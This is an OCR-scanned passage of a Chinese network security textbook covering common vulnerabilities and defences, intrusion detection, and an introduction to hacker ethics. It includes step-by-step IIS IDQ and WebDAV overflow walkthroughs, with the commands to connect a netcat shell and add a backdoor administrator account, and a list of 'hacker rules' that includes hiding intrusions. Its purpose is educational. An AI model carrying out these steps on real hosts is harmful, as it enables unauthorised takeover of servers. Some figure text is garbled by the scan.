IDQ 漏洞 对 操作 系统 的 安全 威胁 非常 大 ,因为 攻击 者 通过 IDQ 漏洞 远程 溢出 成 功 后 ， 
可 以 取得 服务 器 的 管理 员 权 限 。 

微软 公司 曾 发 布 安全 公告 ,指出 其 Index Server 和 Indexing Service 存在 漏洞 。 作 为 安 
装 过 程 的 一 部 分 ,IIS 安装 了 几 个 ISAPI 扩展 DLL。 其 中 的 idq. dll 存在 问题 , 它 是 Index 
Server 的 一 个 组 件 , 对 管理 员 脚 本 (. ida 文件 ) 和 Internet 数据 查询 (. idq 文件 ) 提 供 支持 。 

1) 利用 IDQ 溢出 漏洞 进行 攻击 的 方法 

所 需 工 具 : SuperScan 扫描 器 .IDQ 溢出 工具 、nc. exe。 
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第 一 步 , 运 行 SuperScan 扫描 器 ,定义 IP 段 ,扫描 的 端口 设置 成 3389。 这 样 ,就 能 扫 到 
数 台 3389 口 开 着 的 机 器 。 

第 二 步 ,运行 IDQ 溢出 工具 ,出 现 一 个 窗口 , 填 好 要 入 侵 的 主机 IP, 选 取 所 对 应 的 系统 
SP 补丁 栏 ,其 他 设置 不 改 , 取 默认 。 然 后 按 右边 的 IDQ 溢出 键 。 如 果 成 功 ,将 会 显示 “发 送 
shellcode 到 ' 主 机 地 址 ':80' 成 功 ” 的 提示 ; 如 果 不 成 功 会 提示 连接 错误 。 

第 三 步 , 连 接 成 功 后 ,打开 Windows 下 的 DOS 状态 ,输入 “nc-vv IP 813”, 成 功 后 可 以 
用 net user 创建 用 户 , 用 net localgroup 加 入 管理 员 权 限 , 这 样 就 可 用 2000 客户 端 进入 
主机 。 

2) 防范 策略 

在 “开始 ”一 “程序 ”一 “管理 工具 ”>“Internet 工具 ”菜单 里 选择 IIS 的 属性 ,把 . idq 和 
.ida 的 映射 删除 ,然后 下 载 并 安装 全 部 的 微软 补丁 包 。 

5. WebDAYV 溢出 漏洞 

Microsoft IIS 5. 0(Internet Information Server 5.0) 是 Microsoft Windows 2000 自 带 
的 一 个 网 络 信息 服务 器 (包含 HTTP 服务 )。IIS 5. 0 默认 提供 了 对 WebDAYV 的 支持 ,经 过 
WebDAYV 可 以 通过 HTTP 向 用 户 提供 远程 文件 存储 服务 。 但 是 作为 普通 的 HTTP 服务 
器 ,这 个 功能 不 是 必需 的 。IIS 5. 0 包含 的 WebDAYV 组 件 不 充分 检查 传递 给 部 分 系统 组 件 
的 数据 ,远程 攻击 者 利用 这 个 漏洞 对 WebDAV 进行 缓冲 区 溢出 攻击 ,可 能 以 Web 进程 权 
限 在 系统 上 执行 任意 指令 。 

IIS 5.0 的 WebDAYV 使 用 了 ntdll. dll 中 的 一 些 函数 ,而 这 些 函 数 存在 一 个 缓冲 区 溢出 
漏洞 。 通 过 对 WebDAYV 的 畸形 请 求 可 以 触发 这 个 溢出 。 成 功利 用 这 个 漏洞 可 以 获得 
LocalSystem 权限 。 这 意味 着 人 侵 者 可 以 获得 主机 的 完全 控制 能 力 。 

1) WebDAYV 溢出 漏洞 的 应 用 

所 需 工 具 : WebDAVScan( 用 于 检测 网 段 的 Microsoft IIS 5. 0 服务 器 是 否 提供 了 对 
WebDAYV 的 支持 )、WebDAV(WebDAYV 漏洞 的 溢出 工具 ) 和 nc. exe( 远 程 连接 工具 )。 

首先 ,双击 启动 WebDAVScan 工具 , 填 和 人 待 扫描 的 起 始 IP 与 终止 IP, 单 击 “ 扫 描 ” 按 钮 
进行 网 段 扫 描 , 稍 过 一 会 儿 , 整 个 网 段 的 扫描 结果 就 出 现 了 ,如 图 6-15 所 示 。 


-了 范围 参数 

IE sz. 168.0.1 丫 南 [132. 168.0.254 | 氓 程 ，Ji00 ”超时 ooo0 端 jo 
| 人 | 

IP Address Le | mw | 

192.168.0.210 Mcrosoft-IIS/6.0 Disable 

192. 168.0.60 Mpache/2.0.45 (Wnix) PHP/A.3.1 Disable 

192 168.0.21 Apache/2. 0. 45 (Unix) FHP/4. 3.1 Disable 


6-15 ”WebDAVScan 扫描 结果 
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“开始 ”一 “运行 ?按钮 ,输入 "cmd” 后 按 Enter 键 ,切换 到 保存 有 Webdavx. exe 和 
nc. exe 的 目录 ,在 命令 行 下 输入 “Webdav 192. 168. 0. 21”, 并 按 Enter 键 开 始 溢 出 攻击 ， 
Webdavx 会 自动 寻找 溢出 点 ,如 图 6-16 所 示 。 


NDOWS\systen32\cad. exe 


osoft Corp- 
lc: \Docunents and Settingsvayu.jycd 、\ 
lc: Yead tool 

lc: \toolYWebdav 192.168.8.21 


[Crpt] ntdl1.dl1 exploit trough WehbDhU by kralor [Crpt] 
www-coromputer-net && undernet ficoronputer 


lsyntax: Webdav Cvictin_host> Cyour_host> Cyour_ port> [padding] 


ic:vtool)。 


6-16 WebDAYV 的 工作 结果 


溢出 成 功 后 ,输入 "nc192.168. 0. 21 7788”, 并 按 Enter 键 ,可 以 远程 连接 到 目标 计算 机 
的 一 个 Shell。 为 了 以 后 方便 连接 ,对 guest 账户 设置 一 个 密码 ,并 添加 到 管理 员 组 。 更 改 
guest 密码 的 命令 为 “net user guest 所 更 改 密码 ”, 把 guest 的 用 户 密码 设置 为 hack。 接 下 
来 ,把 guest 账 上 

2) 防范 策略 

启动 注册 表 编 辑 器 (regedt32. exe) ,搜索 注册 表 中 的 键 ; 


未 加 到 管理 员 组 ,格式 为 *net localgroup administrators guest /add”。 


HKEY_LOCAL_ MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters. 


单 击 “ 编 辑 " 菜 单项 , 单 击 增加 值 , 然 后 增加 如 下 键 值 : 


Value name: Disable Webdav 
Data type: DWORD 
Value data: 1 


微软 公司 已 经 为 此 发 布 了 一 个 安全 公告 (MS03-007) 及 相应 补丁 ,下 载 地 址 为 http:// 
www. microsoft. com/technet/security/bulletin/ MS03-007. asp。 

6. SQL 注入 漏洞 

SQL 注入 攻击 (SQL injection) ,简称 注入 攻击 、SQL 注入 ,被 广泛 用 于 非法 获取 网 站 控 
制 权 ,是 发 生 在 应 用 程序 的 数据 库 层 上 的 安全 漏洞 。 在 设计 程序 时 ,忽略 了 对 输入 字符 串 中 
夹带 的 SQL 指令 的 检查 ,被 数据 库 误 认为 是 正常 的 SQL 指令 而 运行 ,从 而 使 数据 库 受 到 攻 
fi ,可 能 导致 数据 被 窃取 更改、 删除 ,以 及 进一步 导致 网 站 被 嵌入 恶意 代码 、 被 植 人 后 门 程 

通常 情况 下 ,SQL 注入 的 位 置 包括 以 下 几 个 。 

(1) 表单 提交 ,主要 是 POST 请 求 , 也 包括 GET 请 求 。 

(2) URL 参数 提交 ,主要 为 GET 请 求 参数 。 

(3) Cookie 参数 提交 。 


外 
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(4) HTTP 请 求 头 部 的 一 些 可 修改 的 值 , 如 Referer、User_Agent 等 。 

(5) 一 些 边缘 的 输入 点 ,如 . mp3 文件 的 一 些 文件 信息 等 。 

常见 的 防范 方法 如 下 。 

(1) 所 有 的 查询 语句 都 使 用 数据 库 提供 的 参数 化 查询 接口 ,参数 化 的 语句 使 用 参数 而 
不 是 将 用 户 输入 变量 嵌入 到 SQL 语句 中 。 当 前 几乎 所 有 的 数据 库 系统 都 提供 了 参数 化 
SQL 语句 执行 接口 ,使 用 此 接口 可 以 非常 有 效 地 防止 SQL 注入 攻击 。 

(2) 对 进入 数据 库 的 特殊 字符 进行 转 义 处 理 或 编码 转换 。 

(3) 确认 每 种 数据 的 类 型 ,如 数字 型 的 数据 就 必须 是 数字 ,数据库 中 的 存储 字段 必须 对 
应 为 int 型 。 

(4) 数据 长 度 应 该 严格 规定 ,能 在 一 定 程度 上 防止 比较 长 的 SQL 注入 语句 无 法 正确 
执行 。 
(5) 网 站 每 个 数据 层 的 编码 统一 ,建议 全 部 使 用 UTF-8 编码 ,上 下 层 编码 不 一 致 有 可 
能 导致 一 些 过 滤 模 型 被 绕 过 。 

(6) 严格 限制 网 站 用 户 的 数据 库 的 操作 权限 ,给 各 用 户 提供 仅仅 能 够 满足 其 工作 的 权 
限 , 从 而 最 大 限度 地 减少 注入 攻击 对 数据 库 的 危害 。 

(7) 避免 网 站 显示 SQL 错误 信息 ,如 类 型 错误 .字段 不 匹配 等 ,防止 攻击 者 利用 这 些 错 
误 信息 进行 一 些 判 断 。 

(8) 在 网 站 发 布 之 前 建议 使 用 一 些 专业 的 SQL 注入 检测 工具 进行 检测 ,及 时 修补 这 些 
SQL 注入 漏洞 。 

7. 跨 站 脚本 漏洞 

跨 站 脚本 攻击 (Cross-Site Scripting,XSS) 发 生 在 客户 端 ,可 被 用 于 进行 窃取 隐私 、 钓 鱼 
欺骗 、 窃 取 密 码 ,传播 恶意 代码 等 攻击 。 

XSS 攻击 使 用 到 的 技术 主要 为 HTML 和 Javascript, 也 包括 VBScript 和 ActionScript 
等 。XSS 攻击 对 Web 服务 器 虽 无 直接 危害 ,但 是 它 借 助 网 站 进行 传播 ,使 网 站 的 用 户 受 到 
攻击 ,导致 网 站 用 户 的 账号 被 窃取 ,从 而 对 网 站 也 产生 了 较 严重 的 危害 。 

XSS 类 型 包括 以 下 几 种 。 

(1) 非 持久 型 跨 站 : 即 反射 型 跨 站 脚本 漏洞 .是 目前 最 普遍 的 跨 站 类 型 。 跨 站 代码 一 
般 存在 于 链接 中 ,请求 这 样 的 链接 时 , 跨 站 代码 经 过 服务 端 反射 回来 ,这 类 跨 站 的 代码 不 存 
储 到 服务 端 ( 如 数据 库 中 ) 。 前 面 所 举 的 例子 就 是 这 类 情况 。 

(2) 持久 型 跨 站 : 这 是 危害 最 直接 的 跨 站 类 型 ,路 站 代码 存储 于 服务 端 (如 数据 库 中 ) 。 
常见 情况 是 某 用 户 在 论坛 发 帖 , 如 果 论 坛 没 有 过 滤 用 户 输入 的 Javascript 代码 数据 ,就 会 导 
致 其 他 浏览 此 帖 的 用 户 的 浏览 器 会 执行 发 帖 人 所 财 入 的 Javascript 代码 。 

(3) DOM 跨 站 (DOM XSS): 是 一 种 发 生 在 客户 端 DOM(CDocument Object Model , 文 
档 对 象 模型 ) 中 的 跨 站 漏洞 ,很 大 原因 是 因为 客户 端 脚本 处 理 罗 辑 导 致 的 安全 问题 。 

常用 的 防范 XSS 技术 包括 以 下 几 种 。 

(1) 与 SQL 注入 防护 的 建议 一 样 , 假 定 所 有 输入 都 是 可 疑 的 ,必须 对 所 有 输入 中 的 
script \iframe 等 字样 进行 严格 的 检查 。 这 里 的 输入 不 仅仅 是 用 户 可 以 直接 交互 的 输入 接 
口 ,也 包括 HTTP 请 求 中 的 Cookie 中 的 变量 .HTTP 请 求 头 部 中 的 变量 等 。 

(2) 不 仅 要 验证 数据 的 类 型 ,还 要 验证 其 格式 长度. 范围 和 内 容 。 
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(3) 不 要 仅仅 在 客户 端 做 数据 的 验证 与 过 滤 ,关键 的 过 滤 步 又 在 服务 端 进行 。 

(4) 对 输出 到 页 面 的 数据 也 要 做 安全 检查 ,数据 库 里 的 值 可 能 在 一 个 大 网 站 的 多 处 都 
有 输出 ,即使 在 输入 时 做 了 编码 等 操作 ,在 各 处 的 输出 点 时 也 要 进行 安全 检查 。 

(5) 在 发 布 应 用 程序 之 前 测试 所 有 已 知 的 威胁 。 

8. 弱 口 令 漏 洞 

弱 口 令 (weak password) 没 有 严格 和 准确 的 定义 ,通常 认为 容易 被 别人 (他 们 有 可 能 对 
你 很 了 解 ) 猜 测 到 或 被 破解 工具 破解 的 口令 均 为 弱 口 令 。 设 置 密码 通常 遵循 以 下 原则 。 

(1) 不 使 用 空 口令 或 系统 默认 的 口令 ,这 些 口 令 众所周知 ,为 典型 的 弱 口 令 。 

(2) 口令 长 度 不 小 于 8 个 字符 。 

(3) 口令 不 应 该 为 连续 的 某 个 字符 (如 AAAAAAAA) 或 重复 某 些 字符 的 组 合 ( 如 
tzf. tzf, )。 

(4) 口令 应 该 为 以 下 四 类 字符 的 组 合 : 大 写字 母 (A-Z) 小写 字母 (a-z) .数字 (0-9) 和 特 
殊 字 符 。 每 类 字符 至 少 包 含 一 个 。 如 果 某 类 字符 只 包含 一 个 ,那么 该 字符 不 应 为 首 字符 或 
尾 字符 。 

(5) 口令 中 不 应 包 仿 本人、 父母. 子女 和 配偶 的 姓名 及 出 生日 期 ,纪念 日 期 ,登录 名 、 
E-mail 地 址 等 与 本 人 有 关 的 信息 ,以 及 字典 中 的 单词 。 

(6) 口令 不 应 该 为 用 数字 或 符号 代替 某 些 字母 的 单词 。 

(7) 口令 应 该 易 记 且 可 以 快速 输入 ,防止 他 人 从 身后 看 到 输入 的 口令 。 

(8) 至 少 90 天 内 更 换 一 次 口令 ,防止 未 被 发 现 的 入侵 者 继续 使 用 该 口令 。 

9. HTTP 报头 追踪 漏洞 

HTTP/1.1(RFC2616) 规 范 定义 了 HTTP TRACE 方法 ,主要 是 用 于 客户 端 通过 向 
Web 服务 器 提交 TRACE 请 求 来 进行 测试 或 获得 诊断 信息 。 当 Web 服务 器 启用 TRACE 
时 ,提交 的 请 求 头 会 在 服务 器 响应 的 内 容 (body) 中 完整 地 返回 ,其 中 HTTP 头 很 可 能 包括 
Session Token .Cookies 或 其 他 认证 信息 。 攻 击 者 可 以 利用 此 漏洞 来 欺骗 合法 用 户 并 得 到 
他 们 的 私人 信息 。 该 漏洞 往往 与 其 他 方式 配合 来 进行 有 效 攻 击 ,由 于 HTTP TRACE 请 求 
可 以 通过 客户 浏览 器 脚本 发 起 (如 XMLHttpRequest) ,并 可 以 通过 DOM 接口 来 访问 ,因此 
很 容易 被 攻击 者 利用 。 

防御 HTTP 报头 追踪 漏洞 的 方法 通常 禁用 HTTP TRACE 方法 。 

10. Struts2 远程 命令 执行 漏洞 


Apache Struts 是 一 款 建立 Java Web 应 用 程序 的 开放 源 代 码 架 构 。Apache Struts 存 
在 一 个 输入 过 滤 错 误 ,如 果 遇 到 转换 错误 可 被 利用 注入 和 执行 任意 Java 代码 。 

网 站 存在 远程 代码 执行 漏洞 的 大 部 分 原因 是 网 站 采用 了 Apache Struts Xwork 作为 网 
站 应 用 框架 ,由 于 该 软件 存在 一 个 远程 代码 执行 高 危 漏 洞 ,导致 网 站 面临 安全 风险 。CNVD 
处 置 过 诸多 此 类 漏洞 ,例如 ,“GPS 车 载 卫星 定位 系统 ”网 站 存在 远程 命令 执行 漏洞 CCNVD- 
2012-13934); Aspcms 留言 本 远程 代码 执行 漏洞 (CNVD-2012-11590) 等 。 

修复 此 类 漏洞 ,只 需 到 Apache 官网 升级 Apache Struts 到 最 新 版 本 。 

11. 文件 上 传 漏洞 


文件 上 传 漏洞 通常 是 由 于 网 页 代码 中 的 文件 上 传 路 径 变量 过 滤 不 严 造成 的 ,如 果 文 件 
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上 传 功能 实现 代码 没有 严格 限制 用 户 上 传 的 文件 后 级 及 文件 类 型 ,攻击 者 可 通过 Web 访问 
的 目录 上 传 任意 文件 ,包括 网 站 后 门 文件 (webshell) ,进而 远程 控制 网 站 服务 器 。 

因此 ,在 开发 网 站 及 应 用 程序 过 程 中 , 需 严 格 限 制 和 校 验 上 传 的 文件 ,禁止 上 传 恶意 代 
码 的 文件 。 同 时 限制 相关 目录 的 执行 权限 ,防范 webshell 攻击 。 

12. 私有 IP 地 址 泄露 漏洞 

IP 地 址 是 网 络 用 户 的 重要 标识 ,是 攻击 者 进行 攻击 前 需要 了 解 的 。 获 取 的 方法 较 多 ， 
攻击 者 也 会 因 不 同 的 网 络 情况 采取 不 同 的 方法 ,如 在 局 域 网 内 使 用 Ping 指令 ,Ping 对 方 在 
网 络 中 的 名 称 而 获得 IP; 在 Internet 上 使 用 IP 版 的 QQ 直接 显示 。 最 有 效 的 办 法 是 截获 
并 分 析 对 方 的 网 络 数据 包 。 攻 击 者 可 以 找到 并 直接 通过 软件 解析 截获 后 的 数据 包 的 IP 包 
头 信息 ,再 根据 这 些 信 息 了 解 具体 的 IP。 

针对 最 有 效 的 “数据 包 分析 方 法 ”而 言 , 就 可 以 安装 能 够 自动 去 掉 发 送 数 据 包 包头 IP 信 
息 的 一 些 软件 。 不 过 使 用 这 些 软件 有 些 缺 点 ,譬如 ,耗费 资源 严重 ,降低 计算 机 性 能 ; 访问 
一 些 论坛 或 者 网 站 时 会 受 影响 ; 不 适合 网 吧 用 户 使 用 ,等 等 。 现 在 的 个 人 用 户 采 用 最 普及 
的 隐藏 IP 的 方法 应 该 是 使 用 代理 ,由 于 使 用 代理 服务 器 后 ,“ 转 址 服务 ”会 对 发 送出 去 的 数 
据 包 有 所 修改 ,致使 “数据 包 分 析 ” 的 方法 失效 。 一 些 容易 泄露 用 户 IP 的 网 络 软件 (QQ、 
MSN IE 等 ) 都 支持 使 用 代理 方式 连接 Internet, 特 别 是 QQ 使 用 “ezProxy” 等 代理 软件 连 
接 后 ,IP 版 的 QQ 都 无 法 显示 该 IP 地 址 。 虽 然 代理 可 以 有 效 地 隐藏 用 户 IP, 但 攻击 者 也 可 
以 绕 过 代理 ,查找 到 对 方 的 真实 IP 地 址 ,用 户 在 何 种 情况 下 使 用 何 种 方法 隐藏 IP, 也 要 因 
情况 而 论 。 

13. 未 加 密 登 录 请 求 

由 于 Web 配置 不 安全 ,登录 请 求 把 诸如 用 户 名 和 密码 等 敏感 字段 未 加 密 进行 传输 , 攻 
击 者 可 以 窃听 网 络 以 截获 这 些 敏 感 信息 。 建 议 进 行 如 SSH 等 的 加 密 后 青 传输 。 

14. 敏感 信息 泄露 漏洞 

SQL 注入 .XSS、 目 录 遍 历 、 弱 口令 等 均 可 导致 敏感 信息 泄露 ,攻击 者 可 以 通过 漏洞 获 
得 敏感 信息 。 针 对 不 同 成 因 ,防御 方式 不 同 。 


6.3.5 系统 漏洞 检测 工具 


当前 ,系统 漏洞 检测 工具 软件 非常 多 ,常用 的 主要 有 360 安全 卫士 .Windows 优化 大 
师 、X-Scan 漏洞 扫描 器 、 瑞 星 卡 卡 \QQ 医生 等 。 

360 安全 卫士 提供 了 系统 漏洞 和 安全 风险 扫描 和 提示 功能 ,能 让 用 户 比较 直观 地 看 出 
系统 中 存在 的 漏洞 及 安全 风险 ,并 且 罗 列 出 了 每 个 漏洞 的 名 称 \ 严 重 程度 .时 间 等 相关 信息 ， 
并 提供 补丁 程序 下 载 及 安装 。 

Windows 优化 大 师 中 的 Wopti 系统 漏洞 修复 应 用 工具 具有 界面 简洁 、 操 作 简单 等 特 
点 。 软 件 中 呈现 出 了 漏洞 名 称 、 公 告 号 、 安 全 等 级 、 漏 洞 描述 等 信息 。Wopti 系统 漏洞 应 用 
工具 在 扫描 速度 上 表现 较为 出 色 。 

X-Scan 漏洞 扫描 器 是 Xfocus 小 组 编写 的 一 个 基于 Windows 平台 的 扫描 软件 ,提供 了 
图 形 界 面 和 命令 行 两 种 操作 方式 ,该 软件 运行 于 Windows 平台 下 ,具有 扫描 速度 快 . 易 于 使 
用 及 科研 自动 升级 等 特点 。X-Scan 采用 多 线程 方式 对 指定 IP 地 址 段 (或 单机 ) 进 行 安全 漏 
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洞 检测 ,支持 插件 功能 ,扫描 内 容 包括 远 程 操 作 系 统 类 型 及 版 本 、 标 准 端口 状态 及 端口 
Banner 信息 .CGI 漏洞 .IIS 漏洞 .RPC 漏洞 .网 络 设 备 漏洞 拒绝 服务 漏洞 .各 种 弱 口 令 漏 洞 
和 后 门 (如 SQL-Server、FTP-Server.SMTP-Server、POP3-Server、NT-Server 弱 口 令 漏 洞 和 
后 门 等 ) .NT 服务 器 NetBIOS 信息 等 二 十 几 个 大 类 。 

QQ 医生 主要 是 为 QQ 软件 服务 ,因此 针对 的 漏洞 修复 方面 也 与 其 他 软件 不 太 相 同 , 主 
要 是 为 了 防范 病毒 或 木马 对 QQ 软件 造成 的 威胁 。 同 样 ,QQ 医生 也 罗列 出 漏洞 的 名 称 、 安 
全 等 级 发 布 时 间 等 信息 。QQ 医生 主要 是 为 QQ 软件 服务 ,因此 漏洞 也 是 与 软件 本 身 安 全 
性 息息相关 的 ,在 漏洞 扫描 速度 上 表现 一 般 。 


《ED 使 用 Snort 进行 入 侵 检测 


/ 实 训 目的 
掌握 入 侵 检 测 概念 方法 ,学 习 用 Snort 工具 进行 人 侵 检测 。 


/ 实 训 内容 
1. 了 解 Snort。 
2. 安装 实验 环境 。 
3. 启动 Snort。 
4. Snort 测试 。 


/ 实 训 环境 
一 台 安 装 Windows 2003/7/10 操作 系统 的 计算 机 ,连接 到 本 地 局 域 网 中 。 


/ 实 训 步 取 
按 本 章 6. 2. 2 节 Snort 入 侵 检测 系统 示例 步骤 操作 完成 本 实 训 。 


本 章 小 结 


(1) 介绍 了 入 侵 检测 的 概念 ,入 侵 检测 系统 的 功能 及 工作 过 程 。 入 侵 检测 按 技术 分 类 
可 以 分 为 特征 检测 和 异常 检测 。 按 监测 对 象 分 类 可 以 分 为 基于 主机 的 入 侵 检 测 和 基于 网 络 
的 入侵 检测 。 网 络 人 侵 检测 系统 的 性 能 指标 主要 包括 三 类 , 即 准确 性 指标 、 效 率 指 标 和 系统 
指标 。 

(2) 入 侵 检测 系统 作为 最 常见 的 网 络 安全 产品 之 一 ,已 经 得 到 了 非常 广泛 的 应 用 。 当 
前 网 络 人 侵 检 测 系统 的 产品 有 很 多 ,主要 有 Snort. 金 诺 网 安 、 安 氏 的 领 信 IDS、 启 明星 辰 的 
天 疗 系 列 、 联 想 的 联想 网 御 IDS、 东 软 、 绿 盟 科 技 的 冰 之 眼 系列 \ 中 科 网 威 的 天 眼 IDS、 思 科 
的 Cisco IDS、CA 的 eTrust IDS 等 ,重点 介绍 了 网 络 入 侵 检测 系统 Snort。 

(3) 系统 漏洞 检测 又 称 漏 洞 扫描 ,就 是 对 重要 网 络 信息 系统 进行 检查 ,发 现 其 中 可 被 攻 
击 者 利用 的 漏洞 。 不 管 攻击 者 是 从 外 部 还 是 从 内 部 攻击 某 一 网 络 系统 ,一 般 都 会 利用 该 系 
统 已 知 的 漏洞 。 
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(4) 介绍 了 入 侵 攻击 可 利用 的 系统 漏洞 类 型 漏洞 检测 技术 分 类 、 检 测 方法 .常见 的 系 
统 漏洞 及 防范 方法 和 检测 工具 。 


. 人 侵 检测 系统 的 主要 功能 有 哪些 ? 

. 简 述 缓冲 区 溢出 攻击 的 原理 。 

. 简 述 入 侵 检 测 系统 的 工作 原理 。 

. 人 侵 检测 系统 实施 的 具体 检测 方法 有 哪些 ? 

. 入 侵 检测 系统 是 由 哪些 部 分 组 成 的 ? 各 自 的 作用 是 什么 ? 
. 简 述 入 侵 检 测 目前 面临 的 挑战 。 

. 什么 是 系统 漏洞 ? 有 哪些 类 型 ? 

. 常用 的 漏洞 检测 工具 有 哪些 ? 


TA 


第 7 蔓 黑 客 攻防 剖析 


在 计算 机 网 络 日 益 成 为 人 们 生活 中 不 可 或 缺 的 工具 时 ,计算 机 网 络 的 安全 性 已 经 引起 
了 公众 的 高 度 重 视 。 计 算 机 网 络 的 安全 威胁 来 自 诸多 方面 ,其 中 黑客 攻击 是 最 重要 的 威胁 
来 源 之 一 。 有 效 地 防范 黑客 的 攻击 ,首先 应 该 做 到 知己 知 彼 , 方 可 百 战 不 列 。 


7.1 黑客 攻防 概述 


7.1.1 黑客 与 骇 客 


黑客 起 源 于 20 世纪 50 年 代 美 国 著名 高 校 的 实验 室 中 ,他 们 智力 非凡 、 技 术 高 超 、 精 力 
充沛 ,热衷 于 解决 一 个 个 棘手 的 计算 机 网 络 难题 。20 世纪 六 七 十 年 代 , “黑客 ”一 词 极 富 询 
义 , 从 事 黑 客 活动 意味 着 对 计算 机 网 络 的 最 大 潜力 进行 智力 上 的 自由 探索 ,所 谓 的 “黑客 " 文 
化 也 随 之 产生 。 然 而 ,并 非 所 有 的 人 都 能 恪守 “黑客 ”文化 的 信条 专注 于 技术 的 探索 ,恶意 的 
计算 机 网 络 破坏 者 信息 系统 的 窃 密 者 随后 层出不穷 ,人 们 把 这 部 分 主观 上 有 恶意 企图 的 人 
称 为 “ 骇 客 "(cracker, 破 坏 者 ) ,试图 区 别 于 “黑客 ”, 同 时 也 诞生 了 诸多 的 黑客 分 类 方法 。 

“黑客 ”大 体 上 应 该 分 为 “善意 ”与 “恶意 ”两 种 , 即 白 帽 (white hat) 及 黑 帽 (black hat)。 
白 帽 依靠 自己 掌握 的 知识 帮助 系统 管理 员 找 出 系统 中 的 漏洞 并 加 以 完善 ,而 黑 帽 则 是 通过 
各 种 黑客 技能 对 系统 进行 攻击 \ 和 人 侵 或 做 其 他 一 些 有 害 于 网 络 的 事情 。 因 为 黑 帽 所 从 事 的 
事情 违背 了 《黑客 守则 》, 所 以 他 们 真正 的 名 字 称 为 “ 骇 客 ”(cracker) 而 非 “ 黑 客 ”(hacker)。 
然而 ,不 论 主观 意图 如 何 ,“ 黑 客 " 的 攻击 行为 在 客观 上 会 对 计算 机 网 络 造 成 极 大 的 破坏 ,同时 
也 是 对 隐私 权 的 极 大 侵犯 ,所 以 在 今天 人 们 把 那些 侵入 计算 机 网 络 的 不 速 之 客 都 称 为 “黑客 ”。 

任何 职业 都 有 相关 的 职业 道德 ,一 名 黑客 同样 有 职业 道德 ,一 些 守 则 是 必须 遵守 的 ,不 
然 会 给 自己 招来 麻烦 。 归 纳 起 来 就 是 “黑客 十 二 条 守则 ”。 

(1) 不 要 恶意 破坏 任何 系统 ,这 样 做 只 会 给 你 带 来 麻烦 。 

(2) 不 要 破坏 别人 的 软件 和 资料 。 

(3) 不 要 修改 任何 系统 文件 ,如 果 是 因为 进入 系统 的 需要 而 修改 了 系统 文件 ,请 在 目的 
达到 后 将 它 改 回 原状 。 

(4) 不 要 轻易 地 将 攻击 过 的 站 点 告诉 自己 不 信任 的 朋友 。 

(5) 在 发 表 黑客 文章 时 不 要 用 真实 名 字 。 

(6) 正在 入 侵 的 时 候 , 不 要 随意 离开 自己 的 计算 机 。 

(7) 不 要 入 侵 或 破坏 政府 机 关 的 主机 。 

(8) 将 自己 的 笔记 放 在 安全 的 地 方 。 

(9) 已 侵入 的 计算 机 中 的 账号 不 得 清除 或 修改 。 

(10) 可 以 为 隐藏 自己 的 侵入 而 作 一 些 修改 ,但 要 尽量 保持 原 系 统 的 安全 性 ,不 能 因为 
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得 到 系统 的 控制 权 而 将 门户 大 开 。 
(11) 不 要 做 一 些 无 聊 .单调 并 且 思 蠢 的 重复 性 工作 。 
(12) 做 真正 的 黑客 , 读 遍 所 有 有 关系 统 安全 或 系统 漏洞 的 书 。 


7.1.2 黑客 的 分 类 及 目的 


1. 黑客 的 分 类 

一 般 情 况 下 ,可 以 将 黑客 分 成 三 类 : 白 帽 子 、 黑 帽子 、 灰 帽子 。 

(1) 白 帽 子 一 一 创新 者 。 力 求 设计 新 系统 ,具有 打破 常规 、 精 研 技 术 和 勇于 创新 的 精 
神 。 追 求 没有 最 好 ,只 有 更 好 。 

(2) 灰 帽 子 一 一 破解 者 。 致 力 于 破解 已 有 系统 ,发 现 现 有 系统 的 问题 和 漏洞 ,突破 极限 
的 禁制 ,能 够 展现 自我 。 追 求 自由 ,并 为 人 民 服 务 。 

(3) 黑 帽 子 一 一 人 侵 者 。 追 求 随意 使 用 资源 ,进行 恶意 破坏 ,散播 蠕虫 ,病毒 ,进行 商业 
间谍 活动 。 信 仰 人 不 为 已 ,天 诛 地 灭 。 

在 网 络 世界 中 ,要 想 区 分 开 谁 是 真正 意义 上 的 黑客 , 谁 是 真正 意义 上 的 入侵 者 并 不 容 
易 , 因 为 有 些 人 可 能 既是 黑客 ,也 是 人 侵 者 。 而 且 在 大 多 数 人 的 眼 里 ,黑客 就 是 入侵 者 。 所 
以 ,在 以 后 的 讨论 中 不 再 区 分 黑客 、 入 侵 者 ,将 他 们 视 为 同一 类 。 

2. 黑客 的 目的 

(1) 好 奇 心 。 许 多 黑 帽 声称 ,他 们 只 是 对 计算 机 及 电话 网 感到 好 奇 , 希 望 通过 探究 这 些 
网 络 更 好 地 了 解 它们 是 如 何 工作 的 。 

(2) 个 人 声望 。 通 过 破坏 具有 高 价值 的 目标 以 提高 在 黑客 社会 中 的 可 信和 度 及 知名 度 。 

(3) 智力 挑战 。 为 了 向 自己 的 智力 极限 挑战 或 为 了 向 他 人 炫耀 ,证 明 自 己 的 能 力 ; 还 
有 些 甚至 不 过 是 想 做 个 “游戏 高 手 ? 或 仅仅 为 了 * 玩 玩 ” 而 已 。 

(4) 窃取 情报 。 在 Internet 上 监视 个 人 、 企 业 及 竞争 对 手 的 活动 信息 及 数据 文件 ,以 达 
到 穷 取 情 报 的 目的 。 

(5) 报复 。 计 算 机 入 侵 者 感到 其 雇主 本 该 提升 自己 、 增 加 薪水 或 以 其 他 方式 承认 他 的 
工作 。 入 侵 活动 成 为 他 反击 雇主 的 方法 ,也 希望 借 此 引起 别人 的 注意 。 

(6) 金钱 。 有 相当 一 部 分 计算 机 犯罪 是 为 了 赚 取 金钱 。 

(7) 政治 目的 。 任 何 政治 因素 都 会 反映 到 网 络 领域 。 主 要 表现 在 敌对 国之 间 利 用 网 络 
的 破坏 活动 ; 或 者 个 人 及 组 织 对 政府 不 满 而 产生 的 破坏 活动 。 这 类 黑 帽 的 动机 不 是 钱 , 几 
乎 永远 都 是 为 政治 ,一般 采用 的 手法 包括 更 改 网 页 植 和 人 计算 机 病毒 等 。 

3. 黑客 行为 发 展 趋势 


黑客 的 行为 有 3 个 方面 发 展 趋势 。 

(1) 手段 高 明 化 : 黑客 界 已 经 意识 到 单 靠 一 个 人 力量 远 远 不 够 了 ,已 经 逐步 形成 了 一 
个 团体 ,利用 网 络 进行 交流 和 团体 攻击 ,互相 交流 经 验 和 自己 编写 的 工具 。 

(2) 活动 频繁 化 : 做 一 个 黑客 已 经 不 再 需要 掌握 大 量 的 计算 机 和 网 络 知识 ,学 会 使 用 
